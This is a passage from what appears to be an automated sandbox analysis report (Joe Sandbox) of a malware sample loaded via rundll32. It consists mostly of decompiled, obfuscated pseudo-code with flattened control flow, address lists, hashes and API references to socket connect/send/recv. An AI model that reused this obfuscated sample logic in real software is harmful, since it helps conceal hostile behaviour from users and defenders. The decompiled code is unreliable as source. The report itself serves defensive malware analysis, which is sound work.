                                                                                                                                                            							while(_t677 != 0x19ebf08) {
                                                                                                                                                            								if(_t677 == _t620) {
                                                                                                                                                            									_push(_v1600);
                                                                                                                                                            									_push(_v1808);
                                                                                                                                                            									_t585 = E0038D389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
                                                                                                                                                            									_t682 =  &(_t682[7]);
                                                                                                                                                            									__eflags = _t585;
                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                            										E00381E67(_v1676, _v1836, _v1684, _v1692, _v1596);
                                                                                                                                                            										E00381E67(_v1828, _v1740, _v1748, _v1668, _v1592);
                                                                                                                                                            										_t682 =  &(_t682[6]);
                                                                                                                                                            									}
                                                                                                                                                            									L14:
                                                                                                                                                            									_t677 = 0x19ebf08;
                                                                                                                                                            									while(1) {
                                                                                                                                                            										L1:
                                                                                                                                                            										L2:
                                                                                                                                                            										_t620 = 0x424d9d2;
                                                                                                                                                            										goto L3;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            								if(_t677 == 0x5bc69f5) {
                                                                                                                                                            									_t592 = E0038D2CE(_t620);
                                                                                                                                                            									__eflags = _t592 - E00373DE2(_t620);
                                                                                                                                                            									_t583 = 0x7574965;
                                                                                                                                                            									_t677 = 0x8166b1d;
                                                                                                                                                            									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
                                                                                                                                                            									goto L2;
                                                                                                                                                            								}
                                                                                                                                                            								if(_t677 == 0x8166b1d) {
                                                                                                                                                            									__eflags = _t675 - _t583;
                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                            										_t677 = 0xd369ee2;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            									_push(_t620);
                                                                                                                                                            									_push(_t620);
                                                                                                                                                            									_t606 = E0038BB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
                                                                                                                                                            									_t682 =  &(_t682[6]);
                                                                                                                                                            									__eflags = _t606;
                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                            										L12:
                                                                                                                                                            										return _t606;
                                                                                                                                                            									}
                                                                                                                                                            									_t677 = 0xd369ee2;
                                                                                                                                                            									goto L1;
                                                                                                                                                            								}
                                                                                                                                                            								if(_t677 == 0xb42e112) {
                                                                                                                                                            									_t677 = 0x5bc69f5;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								if(_t677 == 0xd369ee2) {
                                                                                                                                                            									E0038DA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
                                                                                                                                                            									 *((short*)(E0037B6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
                                                                                                                                                            									E00378969(_v1688,  &_v524, __eflags, _v1620, _v1696);
                                                                                                                                                            									_push(_v1632);
                                                                                                                                                            									_push(_v1744);
                                                                                                                                                            									E003747CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E0038DCF7(_v1680, 0x371328, __eflags),  &_v524, _v1776, _v1712);
                                                                                                                                                            									E0037A8B0(_v1704, _t598, _v1800);
                                                                                                                                                            									_t603 = E0037EA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
                                                                                                                                                            									_t682 =  &(_t682[0x17]);
                                                                                                                                                            									__eflags = _t603;
                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                            										_t583 = 0x7574965;
                                                                                                                                                            										__eflags = _t675 - 0x7574965;
                                                                                                                                                            										_t620 = 0x424d9d2;
                                                                                                                                                            										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            									goto L14;
                                                                                                                                                            								}
                                                                                                                                                            								_t696 = _t677 - 0xe2e667c;
                                                                                                                                                            								if(_t677 != 0xe2e667c) {
                                                                                                                                                            									goto L25;
                                                                                                                                                            								}
                                                                                                                                                            								_push(_v1804);
                                                                                                                                                            								_push( &_v1564);
                                                                                                                                                            								_push(_t620);
                                                                                                                                                            								_push(0);
                                                                                                                                                            								_push( &_v1596);
                                                                                                                                                            								_push(_v1652);
                                                                                                                                                            								_push(0);
                                                                                                                                                            								_t606 = E0037AB87(_v1796, _v1724, _t696);
                                                                                                                                                            								if(_t606 == 0) {
                                                                                                                                                            									goto L12;
                                                                                                                                                            								}
                                                                                                                                                            								E00381E67(_v1644, _v1708, _v1768, _v1788, _v1596);
                                                                                                                                                            								return E00381E67(_v1628, _v1772, _v1780, _v1636, _v1592);
                                                                                                                                                            							}
                                                                                                                                                            							E00381E67(_v1812, _v1732, _v1660, _v1820, _v1600);
                                                                                                                                                            							_t682 =  &(_t682[3]);
                                                                                                                                                            							_t677 = 0xe6feec1;
                                                                                                                                                            							_t583 = 0x7574965;
                                                                                                                                                            							_t620 = 0x424d9d2;
                                                                                                                                                            							L25:
                                                                                                                                                            							__eflags = _t677 - 0xe6feec1;
                                                                                                                                                            						} while (__eflags != 0);
                                                                                                                                                            						return _t583;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}
                                                                                                                                                            0x00386f89
                                                                                                                                                            0x00386f8a
                                                                                                                                                            0x00386f8e
                                                                                                                                                            0x00386f96
                                                                                                                                                            0x00386fa1
                                                                                                                                                            0x00386fa9
                                                                                                                                                            0x00386fb4
                                                                                                                                                            0x00386fbf
                                                                                                                                                            0x00386fc7
                                                                                                                                                            0x00386fd5
                                                                                                                                                            0x00386fd9
                                                                                                                                                            0x00386fe1
                                                                                                                                                            0x00386fec
                                                                                                                                                            0x00386ff7
                                                                                                                                                            0x00387002
                                                                                                                                                            0x0038700d
                                                                                                                                                            0x00387020
                                                                                                                                                            0x00387027
                                                                                                                                                            0x00387032
                                                                                                                                                            0x0038703d
                                                                                                                                                            0x00387050
                                                                                                                                                            0x00387055
                                                                                                                                                            0x0038705e
                                                                                                                                                            0x00387069
                                                                                                                                                            0x00387071
                                                                                                                                                            0x00387079
                                                                                                                                                            0x00387081
                                                                                                                                                            0x00387089
                                                                                                                                                            0x00387094
                                                                                                                                                            0x0038709f
                                                                                                                                                            0x003870aa
                                                                                                                                                            0x003870b5
                                                                                                                                                            0x003870c0
                                                                                                                                                            0x003870cb
                                                                                                                                                            0x003870d6
                                                                                                                                                            0x003870e1
                                                                                                                                                            0x003870ec
                                                                                                                                                            0x003870fe
                                                                                                                                                            0x00387103
                                                                                                                                                            0x0038710c
                                                                                                                                                            0x00387117
                                                                                                                                                            0x0038711f
                                                                                                                                                            0x00387129
                                                                                                                                                            0x0038712c
                                                                                                                                                            0x00387130
                                                                                                                                                            0x00387138
                                                                                                                                                            0x0038714b
                                                                                                                                                            0x00387152
                                                                                                                                                            0x0038715d
                                                                                                                                                            0x00387168
                                                                                                                                                            0x00387173
                                                                                                                                                            0x0038717e
                                                                                                                                                            0x00387186
                                                                                                                                                            0x0038718e
                                                                                                                                                            0x00387193
                                                                                                                                                            0x0038719b
                                                                                                                                                            0x003871a3
                                                                                                                                                            0x003871b6
                                                                                                                                                            0x003871bd
                                                                                                                                                            0x003871c8
                                                                                                                                                            0x003871d0
                                                                                                                                                            0x003871d5
                                                                                                                                                            0x003871da
                                                                                                                                                            0x003871e2
                                                                                                                                                            0x003871ea
                                                                                                                                                            0x00387200
                                                                                                                                                            0x00387207
                                                                                                                                                            0x0038720f
                                                                                                                                                            0x0038721a
                                                                                                                                                            0x00387225
                                                                                                                                                            0x00387230
                                                                                                                                                            0x0038723b
                                                                                                                                                            0x00387248
                                                                                                                                                            0x00387249
                                                                                                                                                            0x00387253
                                                                                                                                                            0x00387257
                                                                                                                                                            0x0038725c
                                                                                                                                                            0x00387264
                                                                                                                                                            0x0038726f
                                                                                                                                                            0x0038727a
                                                                                                                                                            0x00387285
                                                                                                                                                            0x00387296
                                                                                                                                                            0x00387299
                                                                                                                                                            0x0038729d
                                                                                                                                                            0x003872a5
                                                                                                                                                            0x003872ad
                                                                                                                                                            0x003872b5
                                                                                                                                                            0x003872bd
                                                                                                                                                            0x003872c7
                                                                                                                                                            0x003872cb
                                                                                                                                                            0x003872d3
                                                                                                                                                            0x003872e6
                                                                                                                                                            0x003872ed
                                                                                                                                                            0x003872f8
                                                                                                                                                            0x00387303
                                                                                                                                                            0x0038730e
                                                                                                                                                            0x00387319
                                                                                                                                                            0x00387324
                                                                                                                                                            0x0038732c
                                                                                                                                                            0x00387344
                                                                                                                                                            0x00387348
                                                                                                                                                            0x00387350
                                                                                                                                                            0x00387363
                                                                                                                                                            0x00387366
                                                                                                                                                            0x0038736d
                                                                                                                                                            0x00387378
                                                                                                                                                            0x00387380
                                                                                                                                                            0x00387388
                                                                                                                                                            0x0038738d
                                                                                                                                                            0x00387395
                                                                                                                                                            0x0038739d
                                                                                                                                                            0x003873a8
                                                                                                                                                            0x003873b0
                                                                                                                                                            0x003873bb
                                                                                                                                                            0x003873c3
                                                                                                                                                            0x003873cb
                                                                                                                                                            0x003873d0
                                                                                                                                                            0x003873d5
                                                                                                                                                            0x003873dd
                                                                                                                                                            0x003873e8
                                                                                                                                                            0x003873f0
                                                                                                                                                            0x003873fb
                                                                                                                                                            0x0038740f
                                                                                                                                                            0x00387416
                                                                                                                                                            0x00387421
                                                                                                                                                            0x0038742e
                                                                                                                                                            0x00387432
                                                                                                                                                            0x0038743a
                                                                                                                                                            0x0038743f
                                                                                                                                                            0x00387447
                                                                                                                                                            0x0038744f
                                                                                                                                                            0x00387454
                                                                                                                                                            0x00387459
                                                                                                                                                            0x00387461
                                                                                                                                                            0x0038746e
                                                                                                                                                            0x00387472
                                                                                                                                                            0x0038747a
                                                                                                                                                            0x00387482
                                                                                                                                                            0x0038748d
                                                                                                                                                            0x00387498
                                                                                                                                                            0x003874a3
                                                                                                                                                            0x003874ab
                                                                                                                                                            0x003874b0
                                                                                                                                                            0x003874be
                                                                                                                                                            0x003874c8
                                                                                                                                                            0x003874cc
                                                                                                                                                            0x003874d4
                                                                                                                                                            0x003874df
                                                                                                                                                            0x003874f5
                                                                                                                                                            0x003874fe
                                                                                                                                                            0x00387509
                                                                                                                                                            0x00387514
                                                                                                                                                            0x0038751f
                                                                                                                                                            0x0038752a
                                                                                                                                                            0x00387532
                                                                                                                                                            0x00387537
                                                                                                                                                            0x0038753c
                                                                                                                                                            0x00387541
                                                                                                                                                            0x00387549
                                                                                                                                                            0x00387554
                                                                                                                                                            0x0038755c
                                                                                                                                                            0x00387567
                                                                                                                                                            0x00387572
                                                                                                                                                            0x0038757a
                                                                                                                                                            0x00387585
                                                                                                                                                            0x00387590
                                                                                                                                                            0x0038759d
                                                                                                                                                            0x0038759e

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                                                            • API String ID: 0-2206596976
                                                                                                                                                            • Opcode ID: 0e4b6a5d8816974e434f407a57c7990138434ecac5ee403b2dee69e424fbd647
                                                                                                                                                            • Instruction ID: 7d5f610572507fae7e6a78bef7c0a818f97f51245f12089acb5c44a3611b482a
                                                                                                                                                            • Opcode Fuzzy Hash: 0e4b6a5d8816974e434f407a57c7990138434ecac5ee403b2dee69e424fbd647
                                                                                                                                                            • Instruction Fuzzy Hash: CA52FB715083818BD379DF21C98AB9BBBE1BBC4308F108A1DE5DA96260D7B18949CF53
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • _memset.LIBCMT ref: 10012C6C
                                                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                                                            • _strcat.LIBCMT ref: 10012CE9
                                                                                                                                                            • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                                                            • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                                                              • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                                              • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                                              • Part of subcall function 1001DD46: GetDlgItem.USER32(?,C7783548), ref: 1001DD53
                                                                                                                                                              • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                                                            • String ID: Connected$Disconnected$Wait...
                                                                                                                                                            • API String ID: 2263617321-2304371739
                                                                                                                                                            • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                                            • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                                                            • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                                            • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00372251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				char _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				signed int _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				signed int _v160;
                                                                                                                                                            				signed int _v164;
                                                                                                                                                            				signed int _v168;
                                                                                                                                                            				signed int _v172;
                                                                                                                                                            				signed int _v176;
                                                                                                                                                            				signed int _v180;
                                                                                                                                                            				void* _t323;
                                                                                                                                                            				signed int _t369;
                                                                                                                                                            				signed int _t371;
                                                                                                                                                            				signed int _t372;
                                                                                                                                                            				signed int _t373;
                                                                                                                                                            				signed int _t374;
                                                                                                                                                            				signed int _t375;
                                                                                                                                                            				signed int _t376;
                                                                                                                                                            				signed int _t377;
                                                                                                                                                            				signed int _t378;
                                                                                                                                                            				signed int _t379;
                                                                                                                                                            				void* _t382;
                                                                                                                                                            				signed int* _t424;
                                                                                                                                                            				void* _t427;
                                                                                                                                                            				void* _t428;
                                                                                                                                                            				void* _t431;
                                                                                                                                                            
                                                                                                                                                            				_t425 = _a4;
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_t424 = __edx;
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t323);
                                                                                                                                                            				_v104 = 0xfd7ba2;
                                                                                                                                                            				_t428 = _t427 + 0x14;
                                                                                                                                                            				_v104 = _v104 << 2;
                                                                                                                                                            				_v104 = _v104 ^ 0x03f5ee88;
                                                                                                                                                            				_t382 = 0x3e8dc94;
                                                                                                                                                            				_v112 = 0x53a35e;
                                                                                                                                                            				_t371 = 0x1c;
                                                                                                                                                            				_v112 = _v112 / _t371;
                                                                                                                                                            				_v112 = _v112 << 0xb;
                                                                                                                                                            				_v112 = _v112 ^ 0x17ec1018;
                                                                                                                                                            				_v100 = 0x45b9a1;
                                                                                                                                                            				_v100 = _v100 + 0xffff7cfc;
                                                                                                                                                            				_v100 = _v100 ^ 0x004aa95b;
                                                                                                                                                            				_v92 = 0xd93693;
                                                                                                                                                            				_v92 = _v92 + 0xb87a;
                                                                                                                                                            				_v92 = _v92 ^ 0x00df4f59;
                                                                                                                                                            				_v160 = 0x746cf1;
                                                                                                                                                            				_v160 = _v160 ^ 0x2b133776;
                                                                                                                                                            				_v160 = _v160 + 0xffff944c;
                                                                                                                                                            				_v160 = _v160 / _t371;
                                                                                                                                                            				_v160 = _v160 ^ 0x0189d9d1;
                                                                                                                                                            				_v144 = 0x9ec305;
                                                                                                                                                            				_v144 = _v144 + 0xffffd43e;
                                                                                                                                                            				_v144 = _v144 << 3;
                                                                                                                                                            				_v144 = _v144 ^ 0x04f670ec;
                                                                                                                                                            				_v148 = 0x64c482;
                                                                                                                                                            				_v148 = _v148 + 0x3823;
                                                                                                                                                            				_t372 = 0x6f;
                                                                                                                                                            				_v148 = _v148 / _t372;
                                                                                                                                                            				_v148 = _v148 ^ 0x000f1a49;
                                                                                                                                                            				_v68 = 0x131d36;
                                                                                                                                                            				_v68 = _v68 ^ 0xb06b804d;
                                                                                                                                                            				_v68 = _v68 ^ 0xb072f73d;
                                                                                                                                                            				_v124 = 0xcf68d3;
                                                                                                                                                            				_v124 = _v124 + 0x418a;
                                                                                                                                                            				_v124 = _v124 + 0xdb2c;
                                                                                                                                                            				_v124 = _v124 ^ 0x00d4c88c;
                                                                                                                                                            				_v140 = 0x60ea9a;
                                                                                                                                                            				_v140 = _v140 >> 0xa;
                                                                                                                                                            				_v140 = _v140 >> 4;
                                                                                                                                                            				_v140 = _v140 ^ 0x0002f747;
                                                                                                                                                            				_v116 = 0xa906b8;
                                                                                                                                                            				_t373 = 0x61;
                                                                                                                                                            				_v116 = _v116 * 0x66;
                                                                                                                                                            				_v116 = _v116 / _t373;
                                                                                                                                                            				_v116 = _v116 ^ 0x00b9e105;
                                                                                                                                                            				_v152 = 0x1b4b23;
                                                                                                                                                            				_v152 = _v152 + 0x6529;
                                                                                                                                                            				_v152 = _v152 << 7;
                                                                                                                                                            				_v152 = _v152 ^ 0x0dd37b6c;
                                                                                                                                                            				_v56 = 0xb64e13;
                                                                                                                                                            				_t374 = 0x36;
                                                                                                                                                            				_v56 = _v56 / _t374;
                                                                                                                                                            				_v56 = _v56 ^ 0x000ccadc;
                                                                                                                                                            				_v180 = 0xa61587;
                                                                                                                                                            				_v180 = _v180 ^ 0x79fc160a;
                                                                                                                                                            				_t375 = 0x7a;
                                                                                                                                                            				_v180 = _v180 * 0x16;
                                                                                                                                                            				_v180 = _v180 ^ 0x4f1bf23d;
                                                                                                                                                            				_v180 = _v180 ^ 0x22abe71e;
                                                                                                                                                            				_v120 = 0x473252;
                                                                                                                                                            				_v120 = _v120 + 0xffff4692;
                                                                                                                                                            				_v120 = _v120 / _t375;
                                                                                                                                                            				_v120 = _v120 ^ 0x000f54d2;
                                                                                                                                                            				_v60 = 0x2fd158;
                                                                                                                                                            				_v60 = _v60 + 0x5b64;
                                                                                                                                                            				_v60 = _v60 ^ 0x0034a0e9;
                                                                                                                                                            				_v84 = 0xc57bbf;
                                                                                                                                                            				_v84 = _v84 ^ 0x7beef004;
                                                                                                                                                            				_v84 = _v84 ^ 0x7b204221;
                                                                                                                                                            				_v52 = 0xc39e48;
                                                                                                                                                            				_t376 = 0x4d;
                                                                                                                                                            				_v52 = _v52 / _t376;
                                                                                                                                                            				_v52 = _v52 ^ 0x0006d078;
                                                                                                                                                            				_v108 = 0x102acf;
                                                                                                                                                            				_v108 = _v108 >> 0xa;
                                                                                                                                                            				_v108 = _v108 ^ 0x000242b6;
                                                                                                                                                            				_v80 = 0xaaee53;
                                                                                                                                                            				_t377 = 0x79;
                                                                                                                                                            				_v80 = _v80 * 0x74;
                                                                                                                                                            				_v80 = _v80 ^ 0x4d7dabdb;
                                                                                                                                                            				_v88 = 0x1ad2b9;
                                                                                                                                                            				_v88 = _v88 | 0x310da8db;
                                                                                                                                                            				_v88 = _v88 ^ 0x311cb062;
                                                                                                                                                            				_v136 = 0x81cc6c;
                                                                                                                                                            				_v136 = _v136 >> 0xc;
                                                                                                                                                            				_v136 = _v136 << 0xd;
                                                                                                                                                            				_v136 = _v136 ^ 0x0107e876;
                                                                                                                                                            				_v96 = 0x2bc0c4;
                                                                                                                                                            				_v96 = _v96 * 0x4c;
                                                                                                                                                            				_v96 = _v96 ^ 0x0cfd01fe;
                                                                                                                                                            				_v176 = 0x403c4e;
                                                                                                                                                            				_t174 =  &_v176; // 0x403c4e
                                                                                                                                                            				_v176 =  *_t174 / _t377;
                                                                                                                                                            				_t180 =  &_v176; // 0x403c4e
                                                                                                                                                            				_v176 =  *_t180 * 0x5e;
                                                                                                                                                            				_v176 = _v176 << 5;
                                                                                                                                                            				_v176 = _v176 ^ 0x0632c8a8;
                                                                                                                                                            				_v44 = 0x1618ce;
                                                                                                                                                            				_v44 = _v44 + 0xffff8813;
                                                                                                                                                            				_v44 = _v44 ^ 0x00124c47;
                                                                                                                                                            				_v76 = 0x551030;
                                                                                                                                                            				_v76 = _v76 + 0x65ef;
                                                                                                                                                            				_v76 = _v76 ^ 0x005f521e;
                                                                                                                                                            				_v132 = 0xb7ed4f;
                                                                                                                                                            				_v132 = _v132 << 0xb;
                                                                                                                                                            				_v132 = _v132 >> 0xa;
                                                                                                                                                            				_v132 = _v132 ^ 0x002e4b92;
                                                                                                                                                            				_v64 = 0xfb13c3;
                                                                                                                                                            				_v64 = _v64 * 0x16;
                                                                                                                                                            				_v64 = _v64 ^ 0x159ca6b2;
                                                                                                                                                            				_v168 = 0x8e8363;
                                                                                                                                                            				_v168 = _v168 ^ 0x49fc5726;
                                                                                                                                                            				_v168 = _v168 >> 8;
                                                                                                                                                            				_v168 = _v168 >> 4;
                                                                                                                                                            				_v168 = _v168 ^ 0x0002bf0f;
                                                                                                                                                            				_v72 = 0x8b4c84;
                                                                                                                                                            				_t378 = 0x68;
                                                                                                                                                            				_v72 = _v72 / _t378;
                                                                                                                                                            				_v72 = _v72 ^ 0x00015b8a;
                                                                                                                                                            				_v128 = 0x282e65;
                                                                                                                                                            				_v128 = _v128 >> 3;
                                                                                                                                                            				_v128 = _v128 << 9;
                                                                                                                                                            				_v128 = _v128 ^ 0x0a079d52;
                                                                                                                                                            				_v156 = 0xadd370;
                                                                                                                                                            				_t379 = 0x3e;
                                                                                                                                                            				_v156 = _v156 / _t379;
                                                                                                                                                            				_v156 = _v156 << 0xf;
                                                                                                                                                            				_v156 = _v156 + 0xffff35e7;
                                                                                                                                                            				_v156 = _v156 ^ 0x66d9d095;
                                                                                                                                                            				_v164 = 0xb0b7ce;
                                                                                                                                                            				_v164 = _v164 + 0xffffdc7a;
                                                                                                                                                            				_v164 = _v164 * 0x61;
                                                                                                                                                            				_v164 = _v164 + 0xffff24b0;
                                                                                                                                                            				_v164 = _v164 ^ 0x42ea90cd;
                                                                                                                                                            				_v172 = 0xee7b33;
                                                                                                                                                            				_v172 = _v172 | 0x904c1683;
                                                                                                                                                            				_v172 = _v172 * 0x2c;
                                                                                                                                                            				_v172 = _v172 >> 4;
                                                                                                                                                            				_v172 = _v172 ^ 0x0e8d9d52;
                                                                                                                                                            				_v48 = 0xdaf5e6;
                                                                                                                                                            				_v48 = _v48 ^ 0xf4ca4d64;
                                                                                                                                                            				_v48 = _v48 ^ 0xf41f1779;
                                                                                                                                                            				goto L1;
                                                                                                                                                            				do {
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L1:
                                                                                                                                                            						_t431 = _t382 - 0x9c1484f;
                                                                                                                                                            						if(_t431 > 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t431 == 0) {
                                                                                                                                                            							E00373DBC( &_v40, _t424, _v160, _v144, _v148);
                                                                                                                                                            							_t428 = _t428 + 0xc;
                                                                                                                                                            							_t382 = 0x9229f3e;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t382 == 0x3e8dc94) {
                                                                                                                                                            								_t382 = 0xb0d10f2;
                                                                                                                                                            								 *_t424 =  *_t424 & 0x00000000;
                                                                                                                                                            								_t424[1] = _v104;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t382 == 0x73dcb22) {
                                                                                                                                                            									E00380DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
                                                                                                                                                            									_t428 = _t428 + 0x10;
                                                                                                                                                            									_t382 = 0xca0d778;
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t382 == 0x8cfc35c) {
                                                                                                                                                            										E00380DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
                                                                                                                                                            										_t428 = _t428 + 0x10;
                                                                                                                                                            										_t382 = 0xfa9ed0f;
                                                                                                                                                            										continue;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t382 == 0x9229f3e) {
                                                                                                                                                            											E00390E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
                                                                                                                                                            											_t428 = _t428 + 0x10;
                                                                                                                                                            											_t382 = 0xa7e786e;
                                                                                                                                                            											continue;
                                                                                                                                                            										} else {
                                                                                                                                                            											if(_t382 != 0x95701e8) {
                                                                                                                                                            												goto L24;
                                                                                                                                                            											} else {
                                                                                                                                                            												_push(_t382);
                                                                                                                                                            												_push(_t382);
                                                                                                                                                            												_t369 = E00377FF2(_t424[1]);
                                                                                                                                                            												 *_t424 = _t369;
                                                                                                                                                            												if(_t369 != 0) {
                                                                                                                                                            													_t382 = 0x9c1484f;
                                                                                                                                                            													continue;
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L27:
                                                                                                                                                            						__eflags =  *_t424;
                                                                                                                                                            						_t322 =  *_t424 != 0;
                                                                                                                                                            						__eflags = _t322;
                                                                                                                                                            						return 0 | _t322;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t382 - 0xa7e786e;
                                                                                                                                                            					if(_t382 == 0xa7e786e) {
                                                                                                                                                            						E00380DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
                                                                                                                                                            						_t428 = _t428 + 0x10;
                                                                                                                                                            						_t382 = 0x8cfc35c;
                                                                                                                                                            						goto L24;
                                                                                                                                                            					} else {
                                                                                                                                                            						__eflags = _t382 - 0xa84b454;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							E00390E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
                                                                                                                                                            						} else {
                                                                                                                                                            							__eflags = _t382 - 0xb0d10f2;
                                                                                                                                                            							if(_t382 == 0xb0d10f2) {
                                                                                                                                                            								_t424[1] = E0038C631(_t425);
                                                                                                                                                            								_t382 = 0x95701e8;
                                                                                                                                                            								goto L1;
                                                                                                                                                            							} else {
                                                                                                                                                            								__eflags = _t382 - 0xca0d778;
                                                                                                                                                            								if(_t382 == 0xca0d778) {
                                                                                                                                                            									E00380DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
                                                                                                                                                            									_t428 = _t428 + 0x10;
                                                                                                                                                            									_t382 = 0xa84b454;
                                                                                                                                                            									goto L1;
                                                                                                                                                            								} else {
                                                                                                                                                            									__eflags = _t382 - 0xfa9ed0f;
                                                                                                                                                            									if(_t382 != 0xfa9ed0f) {
                                                                                                                                                            										goto L24;
                                                                                                                                                            									} else {
                                                                                                                                                            										E00380DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
                                                                                                                                                            										_t428 = _t428 + 0x10;
                                                                                                                                                            										_t382 = 0x73dcb22;
                                                                                                                                                            										goto L1;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
